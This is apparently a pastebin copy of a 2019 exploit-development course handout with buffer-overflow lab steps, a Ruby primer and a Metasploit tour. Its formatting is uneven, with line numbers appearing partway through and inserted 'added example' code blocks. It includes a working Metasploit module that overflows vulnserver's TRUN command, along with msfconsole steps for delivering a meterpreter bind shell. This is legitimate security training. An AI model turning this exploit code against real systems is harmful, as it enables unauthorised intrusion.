joemccray

Exploit Dev - SN - 2019

Mar 4th, 2019
#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory):
http://45.63.104.73/ExploitLab.zip
http://45.63.104.73/nc-password-is-netcat.zip
http://45.63.104.73/WarFTP.zip
http://45.63.104.73/SEH.zip
http://45.63.104.73/sws.zip
http://45.63.104.73/tftpd.zip


- Extract the ExploitLab.zip file to your Desktop

- Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------

nc localhost 9999
-----------------------------------------------------------------------

- In the new command prompt window where you ran nc, type:
HELP

- Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option "Edit with Notepad++"

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note which command it crashed on and how many As were sent.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note which command it crashed on and how many As were sent.

- Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to the process vulnserv.exe

- Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (0x41).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 non-repeating chars to vulnserv.exe and populates EIP with the value 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw that EIP is overwritten with 396F4338, which read in little-endian byte order is 8 (0x38), C (0x43), o (0x6F), 9 (0x39)
- so we search for 8Co9 in the string of non-repeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check that our calculation of the distance to EIP is correct by overwriting EIP with 42424242 (BBBB)

6-jmp-esp.py
- In this script we overwrite EIP with the address of a JMP ESP instruction (6250AF11) inside essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it on your Ubuntu host via SCP, or copy it and paste the code into the host.
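To see where the 2006 in the script name comes from, here is an added example (not one of the lab scripts, and not Metasploit's own pattern_create.rb / pattern_offset.rb, which the ff2.py questions ask about) that reimplements the same cyclic-pattern logic in Ruby and resolves the EIP value 396F4338 from the walkthrough; the function names are my own.

```ruby
# Added example: the cyclic-pattern logic behind pattern_create.rb and
# pattern_offset.rb, rewritten in Ruby. Function names are my own.

UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a

# Build a non-repeating pattern of the given length. Every 3-byte chunk is
# upper+lower+digit (Aa0Aa1Aa2...), so the 4 bytes that land in EIP pin down
# a single position within the full 26*26*10*3 = 20280-byte cycle.
def pattern_create(length)
  out = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGIT.each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]
end

# Turn the value shown in EIP (e.g. 0x396F4338) into the 4 bytes as they sit
# in the buffer. x86 is little-endian, so 396F4338 is stored as "8Co9".
def eip_to_bytes(eip)
  [eip].pack('V') # 'V' = 32-bit unsigned, little-endian
end

# Distance from the start of the buffer to the bytes that ended up in EIP.
# Returns nil if the value did not come from the pattern (e.g. 41414141).
def pattern_offset(eip, length = 3000)
  pattern_create(length).index(eip_to_bytes(eip))
end

# Build the check buffer the way 5-2006char-eip-check.py does: As up to the
# offset, then BBBB, then filler so the total size matches the crash buffer.
def eip_check_buffer(offset, total = 3000)
  buf = 'A' * offset + 'BBBB'
  buf << 'C' * (total - buf.length) if buf.length < total
  buf
end

# The 32-bit value the CPU would load from the 4 bytes at the given offset.
def eip_value_at(buf, offset)
  buf[offset, 4].unpack('V').first
end

if __FILE__ == $0
  offset = pattern_offset(0x396F4338)
  puts "EIP 396F4338 -> bytes #{eip_to_bytes(0x396F4338).inspect} at offset #{offset}"
  buf = eip_check_buffer(offset)
  printf("EIP would be overwritten with %08X\n", eip_value_at(buf, offset)) # 42424242
end
```

If pattern_offset returns nil, the value in EIP did not come from the pattern and the crash needs another look before the offset math is trusted.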


------------------------------



#########################################
# FreeFloat FTP Server Exploit Analysis #
#########################################


Analyze the following exploit code:
https://www.exploit-db.com/exploits/15689/

1. What is the target platform that this exploit works against?
2. What is the variable name for the distance to EIP?
3. What is the actual distance to EIP in bytes?
4. Describe what is happening in the variable 'junk2'


Analysis of the training walk-through based on EID: 15689:
http://45.63.104.73/ff.zip


ff1.py
1. What does the sys module do? Call System Commands
2. What is sys.argv[1] and sys.argv[2]?
3. What application entry point is being attacked in this script?


ff2.py
1. Explain what lines 18 - 20 are doing.
2. What is pattern_create.rb doing and where can I find it?
3. Why can't I just double-click the file to run this script?


ff3.py
1. Explain what is happening in lines 17 to 25.
2. Explain what is happening in lines 30 to 32.
3. Why is everything below line 35 commented out?


ff4.py
1. Explain what is happening in lines 13 to 15.
2. Explain what is happening in line 19.
3. What is the total length of buff?


ff5.py
1. Explain what is happening in line 15.
2. What is struct.pack?
3. How big is the shellcode in this script?


ff6.py
1. What is the distance to EIP?
2. How big is the shellcode in this script?
3. What is the total byte length of the data being sent to this app?


ff7.py
1. What is a tuple in Python?
2. How big is the shellcode in this script?
3. Did your app crash from this script?


ff8.py
1. How big is the shellcode in this script?
2. What is try/except in Python?
3. What is socket.SOCK_STREAM in Python?


ff9.py
1. What is going on in lines 19 and 20?
2. What is the length of the NOPs?
3. What is socket.SOCK_STREAM in Python?


ff010.py
1. What is going on in lines 18 - 20?
2. What is going on in lines 29 - 32?
3. How would a stack adjustment help this script?


Required review videos to watch tonight:
----------------------------------------
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
Please watch videos 1-5 tonight. Vivek has a deep accent, so I understand that it may be difficult, but his material is very good - probably the best on the internet today.

Recommended (not required) videos to watch tonight:
---------------------------------------------------
For more background on assembly I would recommend the following video series (videos 1-11):
https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
Again, you DO NOT have to watch these tonight, but if you are really interested in the subject of exploit development I think they will be very helpful.



---------------------------------------------------------------------------------------------------------------------

############################
# Day 2: Ruby Fundamentals #
############################


- Ruby is a general-purpose, object-oriented programming language created by Yukihiro Matsumoto, a computer
scientist and programmer from Japan. It is a cross-platform dynamic language.

- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
on Rails is a framework that is written in Ruby.

- Ruby's file name extensions are .rb and .rbw.

- The official website of this language is www.ruby-lang.org.

- Ruby ships with an interactive shell called irb (Interactive Ruby Shell).

- Open up the interactive console and play around.

---------------------------Type This-----------------------------------
irb
-----------------------------------------------------------------------


- Math, Variables, Classes, Creating Objects and Inheritance


Ruby supports the following arithmetic operators:
Addition operator (+) — 10 + 23
Subtraction operator (-) — 1001 - 34
Multiplication operator (*) — 5 * 5
Division operator (/) — 12 / 2


- Now let's cover some variable techniques. In Ruby, you assign a value to a variable with the assignment
operator '='. In the following example, 25 is assigned to x and then the expression x + 30 is evaluated (x itself
is not changed). Likewise, 69 is assigned to y and then y + 33 is evaluated.

---------------------------Type This-----------------------------------
x = 25
x + 30
y = 69
y + 33
-----------------------------------------------------------------------


- Let's look at creating classes and creating objects.

- Here, the name of the class is Attack. An object has its properties (attributes) and methods; attr_accessor
creates a getter and a setter for each attribute listed.


---------------------------Type This-----------------------------------
class Attack
  attr_accessor :of, :sqli, :xss
end
-----------------------------------------------------------------------


What is nil?
Reference:
https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638

nil is the Ruby object that represents nothingness. Whenever a method doesn't return a useful value, it returns nil. puts and print are methods that return nil.

Since the Ruby console always shows the value of the last statement or expression in your code, if that last statement is print, you'll see the nil.

To prevent the nil from "sticking" to the output of print (which doesn't insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code; the console will then show that value instead of nil.


# Now that we have created the class let's create the objects
---------------------------Type This-----------------------------------
first_attack = Attack.new
first_attack.of = "stack"
first_attack.sqli = "blind"
first_attack.xss = "dom"
puts first_attack.of
puts first_attack.sqli
puts first_attack.xss
-----------------------------------------------------------------------


- Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
an object of one class can access the properties/attributes defined by another (parent) class. Inheritance makes your
programming life easier by maximizing code reuse.


---------------------------Type This-----------------------------------
class Exploitframeworks
  attr_accessor :scanners, :exploits, :shellcode, :postmodules
end
class Metasploit < Exploitframeworks
end
class Canvas < Exploitframeworks
end
class Coreimpact < Exploitframeworks
end
class Saint < Exploitframeworks
end
class Exploitpack < Exploitframeworks
end
-----------------------------------------------------------------------


- Methods, More Objects, Arguments, String Functions and Expression Shortcuts

- Let's create a simple method. A method is used to perform an action and is generally called on an object.

- Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
it will print this string: "We are Learning how to PenTest"

- An object named 'joe' is created, which is used to call the method.


---------------------------Type This-----------------------------------
class Msfnl
  def learning
    puts "We are Learning how to PenTest"
  end
end
-----------------------------------------------------------------------

# Now let's create an object and call our method on it

---------------------------Type This-----------------------------------
joe = Msfnl.new
joe.learning
-----------------------------------------------------------------------


- An argument is a value or variable that is passed to a method when calling it. In the following example, while
calling the puts() method, we are sending a string value to it. This string value is used by the
method to perform its particular operation.

puts("Pentesting")


- There are many useful string functions (methods) in Ruby. String methods make it easy to work with strings. Now, we will
explain some useful string methods with an example.

- The length method returns the length of a string. The upcase method converts a string to uppercase. And the
reverse method reverses a string. The following example demonstrates how to use these string methods (and .class,
which tells you what kind of object a value is).

---------------------------Type This-----------------------------------
55.class
"I Love Programming".class
"I Love Pentesting".length
"Pown that box".upcase
"Love" + "To Root Boxes"
"evil".reverse
"evil".reverse.upcase
-----------------------------------------------------------------------


- Expressions and shortcuts. In the example below, 'a' is an operand, '3' is an operand, '=' is
an operator, and 'a=3' is the expression. A statement consists of one or more expressions. Following are
examples of some expressions.

---------------------------Type This-----------------------------------
a = 3
b = 6
a+b+20
d = 44
f = d
puts f
-----------------------------------------------------------------------


- Shortcuts: += and *= are the shortcuts. These operators are also called abbreviated
assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
statements to understand the shortcuts.

---------------------------Type This-----------------------------------
g = 70
g = g+44
g += 33
-----------------------------------------------------------------------


- In the last statement above, g is incremented by 33 and the total is assigned back to g.


---------------------------Type This-----------------------------------
g *= 3
-----------------------------------------------------------------------


- In the above statement, g is multiplied by 3 and the result is assigned back to g.


- Comparison Operators, Loops, Data Types, and Constants

- Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
how to use the following comparison operators.

'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
variable or constant. If it's less than the other, the 'less than' operator returns true.

'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
or constant. If it's equal to the other, the 'equal to' operator returns true.

'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.

---------------------------Type This-----------------------------------
numberofports = 55
puts "number of ports found during scan" if numberofports < 300
numberofports = 400
puts "number of ports found during scan" if numberofports < 300
puts "number of ports found during scan" if numberofports == 300
puts "number of ports found during scan" if numberofports != 300
-----------------------------------------------------------------------


- The 'OR' operator and the 'unless' keyword. The symbol '||' represents the logical 'OR' operator.

- This operator is generally used to combine multiple conditions.
- In the case of two conditions, if either or both of the conditions is true, the 'OR' operator returns true. Consider the
following example to understand how this operator works.

---------------------------Type This-----------------------------------
ports = 100
puts "number of ports found on the network" if ports<100 || ports>200
puts "number of ports found on the network" if ports<100 || ports>75
-----------------------------------------------------------------------

# unless

---------------------------Type This-----------------------------------
portsbelow1024 = 50
puts "If the ports are below 1024" unless portsbelow1024 < 1000
puts "If the ports are below 1024" unless portsbelow1024 < 1055
puts "If the ports are below 1024" unless portsbelow1024 < 20
-----------------------------------------------------------------------

- The 'unless' keyword runs a statement unless its condition is true, i.e. only when the condition is false.



- Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.

- See the following example to understand how a string is printed 10 times on the screen using a loop.

---------------------------Type This-----------------------------------
10.times do puts "infosecaddicts" end
-----------------------------------------------------------------------

# Or use the curly braces

---------------------------Type This-----------------------------------
10.times {puts "infosecaddicts"}
-----------------------------------------------------------------------


- Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
working with different data types. Data type conversion is also known as type casting.


- Constants: Unlike variables, the values of constants remain fixed while the program runs. So if you
change the value of a constant, you will see a warning message.



- Multiple Line String Variable, Interpolation, and Regular Expressions

- A multiple line string variable (a heredoc) lets you assign a value that spans multiple lines to a string variable.

---------------------------Type This-----------------------------------
infosecaddicts = <<mark
welcome
to the
best
metasploit
course
on the
market
mark
puts infosecaddicts
-----------------------------------------------------------------------


- Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
it represents. So whatever you write inside #{ } will be evaluated and the value will be substituted at that position.
Examine the following example to understand how interpolation works in Ruby.

References:
https://stackoverflow.com/questions/10869264/meaning-of-in-ruby


---------------------------Type This-----------------------------------
a = 4
b = 6
puts "a * b = a*b"
puts " #{a} * #{b} = #{a*b} "
person = "Joe McCray"
puts "IT Security consultant person"
puts "IT Security consultant #{person}"
-----------------------------------------------------------------------

- Notice that the placeholders inside #{ } are evaluated and replaced with their values, while the plain strings
on the first and third puts lines are printed literally.


- Character classes: [lma] matches any one of the characters l, m or a, and [a-m] matches any single letter from a
through m. scan hands each match to the block, which prints it.
---------------------------Type This-----------------------------------
infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
"I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
"I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
-----------------------------------------------------------------------


- Arrays, Push and Pop, and Hashes


- In the following example, numbers is an array that holds 6 integers. Array indexes start at 0.


---------------------------Type This-----------------------------------
numbers = [2,4,6,8,10,100]
puts numbers[0]
puts numbers[4]
numbers[2] = 150
puts numbers
-----------------------------------------------------------------------


- Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
Here << pushes an element onto the end of the array, pop removes the last element, and shift removes the first
element (queue behaviour rather than stack behaviour).


---------------------------Type This-----------------------------------
framework = []
framework << "modules"
framework << "exploits"
framework << "payloads"
framework.pop
framework.shift
-----------------------------------------------------------------------

- A hash is a collection of elements, like the associative array in other languages. Each element has a key
that is used to access the element.


- Hash is a Ruby object with its own built-in methods. The methods make it easy to work with hashes.
In this example, 'metasploit' is a hash. 'exploits', 'microsoft' and 'Linux' are the keys, and the following are the
respective values: 'what module should you use', 'Windows XP' and 'SSH'.

---------------------------Type This-----------------------------------
metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
print metasploit.size
print metasploit["microsoft"]
metasploit['microsoft'] = 'redhat'
print metasploit['microsoft']
-----------------------------------------------------------------------


- Writing Ruby Scripts


- Let's take a look at one of the Metasploit Ruby modules and work out exactly what it is doing. If we read the
Ruby program, what we find is that it is a TCP port scanner that someone made to look for a specific port. The port
that it is looking for is port 21 (FTP).
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
ls
-----------------------------------------------------------------------
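As an added example (written from scratch for these notes, not the tcp.rb module itself), here is the core of what such a scanner does, using the Ruby pieces covered above: a TCP connect attempt per port, a hash of results keyed by port number, and an interpolated report line for the one port of interest. The function names, the host 10.0.0.5 in the comments and the injectable checker are my own assumptions.

```ruby
require 'socket'
require 'timeout'

# TCP connect check: true if host:port accepts a connection, false if it is
# refused, unreachable, unresolvable or silent past the timeout.
def port_open?(host, port, timeout = 1)
  Timeout.timeout(timeout) do
    TCPSocket.new(host, port).close
    true
  end
rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ENETUNREACH,
       Errno::ETIMEDOUT, SocketError, Timeout::Error
  false
end

# Scan each port and collect the result in a hash keyed by port number,
# the same structure as the 'metasploit' hash earlier in these notes.
# The checker can be swapped for a stub so the logic runs without a network.
def scan_ports(host, ports, checker = method(:port_open?))
  ports.each_with_object({}) do |port, results|
    results[port] = checker.call(host, port) ? :open : :closed
  end
end

# The portscan module in the notes only cares about one port (21, FTP);
# string interpolation builds the report line from the results hash.
def report_line(host, results, wanted = 21)
  state = results.fetch(wanted, :unscanned)
  "#{host}:#{wanted} is #{state}"
end

# Constructed offline demonstration: a loopback listener stands in for an
# FTP service, and a second port that was bound then released is the closed one.
def demo
  listener = TCPServer.new('127.0.0.1', 0)
  open_port = listener.addr[1]
  spare = TCPServer.new('127.0.0.1', 0)
  closed_port = spare.addr[1]
  spare.close
  results = scan_ports('127.0.0.1', [open_port, closed_port])
  listener.close
  [report_line('127.0.0.1', results, open_port),
   report_line('127.0.0.1', results, closed_port)]
end

puts demo if __FILE__ == $0
```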
  571.  
  572.  
  573.  
  574. ###########################
  575. # Metasploit Fundamentals #
  576. ###########################
  577.  
  578. - Let's take a little look at Metasploit Framework
  579.  
  580. - First, we should take note of the different directories, the Modular Architecture.
  581.  
  582. The modules that make up the Modular Architecture are
  583. Exploits
  584. Auxiliary
  585. Payload
  586. Encoder
  587. Nops
  588.  
  589.  
  590. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  591.  
  592. are
  593.  
  594. Modules
  595. Scripts
  596. Plugins
  597. External
  598. Data
  599. Tools
  600.  
  601. - Let's take a look inside the Metasploit directory and see what's the
  602. ---------------------------Type This-----------------------------------
  603. cd ~/toolz/metasploit
  604. ls
  605. -----------------------------------------------------------------------
  606.  
  607.  
  608.  
  609. - Now let's take a look inside the Modules directory and see what's there.
  610. ---------------------------Type This-----------------------------------
  611. cd ~/toolz/metasploit/modules
  612. ls
  613. -----------------------------------------------------------------------
  614.  
  615.  
  616. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  617. not necessarily need to - have a shell or session started on a machine.
  618.  
  619. The exploits directory has our modules that we need to pop a shell on a box.
  620. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  621. like Burp Suite
  622. - Let's take a look at the external directory
  623. ---------------------------Type This-----------------------------------
  624. cd ~/toolz/metasploit/external
  625. ls
  626. -----------------------------------------------------------------------
  627.  
  628. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  629. ---------------------------Type This-----------------------------------
  630. cd ~/toolz/metasploit/data
  631. ls
  632. -----------------------------------------------------------------------
  633.  
  634. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  635. brute-forcing
  636. ---------------------------Type This-----------------------------------
  637. cd ~/toolz/metasploit/data/wordlists
  638. ls
  639. -----------------------------------------------------------------------
  640.  
  641. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  642. once a session is created.
  643. ---------------------------Type This-----------------------------------
  644. cd ~/toolz/metasploit/data/meterpreter
  645. ls
  646. -----------------------------------------------------------------------
  647.  
  648. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  649. like escalating privileges and dumping hashes.
  650.  
  651. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  652. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  653. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  654. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  655. custom shellcode.
  656.  
  657. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  658. to do with other programs to make things like importing and exporting reports simple.
  659. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  660. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  661. modules we're going to have a better understanding of where everything needs to go.
  662. ---------------------------Type This-----------------------------------
  663. cd ~/toolz/metasploit/modules/exploits
  664. ls
  665. -----------------------------------------------------------------------
  666.  
  667.  
  668. - The exploits directory is split up into several different directories, each one housing exploits for different types
  669. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  670. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  671. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  672. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  673. for us.
  674. ---------------------------Type This-----------------------------------
  675. cd ~/toolz/metasploit/modules/auxiliary/
  676. ls
  677. -----------------------------------------------------------------------
  678.  
  679.  
  680. - And a little further into the directory, let's take a look at what's in the scanner directory
  681. ---------------------------Type This-----------------------------------
  682. cd ~/toolz/metasploit/modules/auxiliary/scanner/
  683. ls
  684. -----------------------------------------------------------------------
  685.  
  686.  
  687. - And one more folder deeper into the structure, let's take a look in the portscan folder
  688. ---------------------------Type This-----------------------------------
  689. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  690. ls
  691. -----------------------------------------------------------------------
  692.  
  693. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  694. and report them back to us in a nice, easily readable format.
  695.  
  696. cat tcp.rb
  697.  
  698.  
  699.  
  700. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  701. once you have a session on a machine.
  702. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  703. succeeds.
  704. ---------------------------Type This-----------------------------------
  705. cd ~/toolz/metasploit/modules/payloads/
  706. ls
  707. -----------------------------------------------------------------------
  708.  
  709.  
  710. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  711. application for it to be used as.
  712. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  713. do everything once you have that shell calling back to you.
  714. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  715. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  716. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  717. to download Stages payloads.
  718.  
  719.  
  720. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  721. shells.
  722. ---------------------------Type This-----------------------------------
  723. cd singles
  724. cd windows
  725. ls
  726. -----------------------------------------------------------------------
  727.  
  728.  
  729. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  730. see what it actually does.
  731. ---------------------------Type This-----------------------------------
  732. cat adduser.rb
  733. -----------------------------------------------------------------------
  734.  
735. Looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
736. the new user "Metasploit" a password of "Metasploit$1". Further down in the file we can see the actual command
737. that it gives Windows to add the user to the system.
  738.  
  739.  
740. - Stagers just connect the victim machine back to yours to download the stage payload, usually via
741. 
742. windows/shell/bind_tcp or windows/shell/reverse_tcp
  743. ---------------------------Type This-----------------------------------
  744. cd ../../stagers
  745. ls
  746. -----------------------------------------------------------------------
  747.  
  748.  
  749.  
  750. - Again, we can see that we have stagers for multiple systems and code types.
  751. ---------------------------Type This-----------------------------------
  752. ls windows/
  753. -----------------------------------------------------------------------
  754.  
  755.  
756. As you can see, the stagers are mainly there to connect to the victim and set up a bridge between us and the victim
757. machine, so we can upload or download our stage payloads and execute commands.
758. Lastly, we can go to our stages directory to see which payloads are available for us to send over for use with
759. our stagers...
  760. ---------------------------Type This-----------------------------------
  761. cd ../stages
  762. ls
  763. -----------------------------------------------------------------------
  764.  
  765.  
766. Again, we can see that our stages are coded for particular operating systems and languages.
767. We can take a look at shell.rb and see the shellcode that would be put into the payload staged on the victim
768. machine. That shellcode is encoded to tell the victim machine where to connect back to and what commands to run,
769. if any.
  770.  
  771. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  772. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  773. so we can impersonate other users on the system in hopes of elevating our privileges.
  774. ---------------------------Type This-----------------------------------
  775. cd ../../../post/
  776. ls
  777. cd windows/
  778. ls
  779. -----------------------------------------------------------------------
  780.  
  781.  
782. Inside the windows directory we can see all the post modules that can be run. The capture directory holds all
783. the modules that load keyloggers or grab input from the victim machine. The escalate directory has modules that
784. try to escalate our privileges. The gather directory has modules that enumerate the host to get as much
785. information as possible out of it. The wlan directory holds modules that pull down the WiFi access points the
786. victim has in memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for each network.
  787.  
788. 
789. ------------------------------------------
790. 
802. ---------------------------Type This-----------------------------------
803. 
804. cd ~/toolz/metasploit/modules/exploits/windows/misc
805. 
806. nano vulnserv.rb
807. -------(paste the code below into this file)-------
808. #
809. #
810. # Quick Metasploit exploit for vulnserver.exe
811. # Written by: Joe McCray
812. # Email: joe@strategicsec.com
813. #
814. # Place this exploit in:
815. # ~/toolz/metasploit/modules/exploits/windows/misc
816. #
817. require 'msf/core'
818. 
819. class Metasploit3 < Msf::Exploit::Remote
820.   include Msf::Exploit::Remote::Tcp
821. 
822.   def initialize(info = {})
823.     super(update_info(info,
824.       'Name'        => 'Custom vulnerable server stack overflow',
825.       'Description' => %q{
826.         This module exploits a stack overflow in an app called
827.         vulnserver that is designed to teach simple exploitation.
828.       },
829.       'Author'      => [ 'Joe McCray' ],
830.       'DefaultOptions' =>
831.         {
832.           'EXITFUNC' => 'process',
833.         },
834.       'Payload' =>
835.         {
836.           'Space'    => 800,          # room available for the encoded payload
837.           'BadChars' => "\x00\x20",   # bytes the payload must not contain
838.         },
839.       'Platform' => 'win',
840. 
841.       'Targets' =>
842.         [
843.           [
844.             'Windows XP SP3 EN',
845.             {
846.               'Ret' => 0x625011AF,    # address EIP is overwritten with (a JMP ESP on this target)
847.             }
848.           ],
849.         ],
850.       'DefaultTarget' => 0,
851. 
852.       'Privileged' => false
853.     ))
854. 
855.     register_options(
856.       [
857.         Opt::RPORT(9999)
858.       ], self.class)
859.   end
860. 
861.   def exploit
862.     connect
863.     sock.recv(1024)                   # read the welcome banner
864. 
865.     p = "\x41" * 16                   # padding before the payload
866.     p << payload.encoded
867. 
868.     hdr  = "TRUN ."
869.     boom = pattern_create(3000)       # cyclic pattern as filler
870.     boom[2006, 4] = [target.ret].pack('V') # EIP value (little-endian)
871.     boom[2010, p.length] = p          # padding + payload, where ESP points after the jump
872. 
873.     sploit = hdr + boom
874. 
875.     sock.put(sploit)
876. 
877.     handler
878.     disconnect
879. 
880.   end
881. 
882. end
883. ------------------end of copy/paste content --------------
  883.  
  884.  
  885.  
  886. ---------------------------Type This-----------------------------------
  887. cd ~/toolz/metasploit
  888.  
  889. ./msfconsole
  890.  
  891.  
  892.  
  893. use exploit/windows/misc/vulnserv
  894. set PAYLOAD windows/meterpreter/bind_tcp
  895. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  896. set RPORT 9999
  897. exploit
  898. -----------------------------------------------------------------------
  899. ###########################
  900. # Lab 1a: Stack Overflows #
  901. ###########################
  902.  
903. #################################
904. # Start WarFTPd                 #
905. # Start WinDBG                  #
906. # Press F6                      #
907. # Attach to war-ftpd.exe        #
908. #################################
  909.  
  910. ---------------------------Type This-----------------------------------
  911. c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
  912. -----------------------------------------------------------------------
  913.  
  914. At WINDBG prompt
  915. “r” to show registers or “alt+4”
  916.  
  917. ---------------------------Type This-----------------------------------
  918. 0:003> dd eip
  919. 0:003> dd esp
  920. -----------------------------------------------------------------------
  921.  
  922. ---------------------------Type This-----------------------------------
  923.  
  924. c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
  925. -----------------------------------------------------------------------
  926.  
  927.  
  928. At WINDBG prompt
  929. “r” to show registers or “alt+4”
  930.  
  931. ---------------------------Type This-----------------------------------
  932.  
  933. 0:003> dd eip
  934. 0:003> dd esp
  935. -----------------------------------------------------------------------
  936.  
  937. Eip: 32714131
  938. esp: affd58 (71413471)
  939.  
  940. Now we need to SSH into the StrategicSec Ubuntu host
  941.  
  942. ---------------------------Type This-----------------------------------
  943.  
  944. cd /home/strategicsec/toolz/metasploit/tools
  945.  
  946. ruby pattern_offset.rb 32714131
  947. 485
  948.  
  949. ruby pattern_offset.rb 71413471
  950. 493
  951. -----------------------------------------------------------------------
  952.  
  953. Distance to EIP is: 485
  954. Relative position of ESP is: 493
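The lab uses Metasploit's pattern_create.rb and pattern_offset.rb for this step. As an added example (not one of the workshop's tools), here is a Python 3 reimplementation of the same Aa0Aa1Aa2... scheme, so the two offsets above, and the ones in Lab 2a, can be re-derived from the register values WinDBG shows. The value passed to pattern_offset is the 32-bit register value as printed by the debugger; the function converts it to the byte order in which it sits in memory.

```python
# Added example, not one of the workshop's scripts: Python 3 version of the
# Metasploit-style cyclic pattern (pattern_create / pattern_offset).
import string
import struct

FULL_LENGTH = 26 * 26 * 10 * 3   # the Aa0..Zz9 pattern repeats after 20280 bytes


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2...Zz9 (truncated at 20280)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=FULL_LENGTH):
    """Offset of `value` in the pattern, or -1 if it is not part of the pattern.

    `value` may be an int such as 0x32714131 (the register value shown by the
    debugger, converted to little-endian bytes), a str fragment, or raw bytes.
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # EIP and the dword at ESP from the WarFTPd crash above.
    for reg, val in (("EIP", 0x32714131), ("ESP", 0x71413471)):
        print("%s = 0x%08x -> offset %d" % (reg, val, pattern_offset(val)))
```

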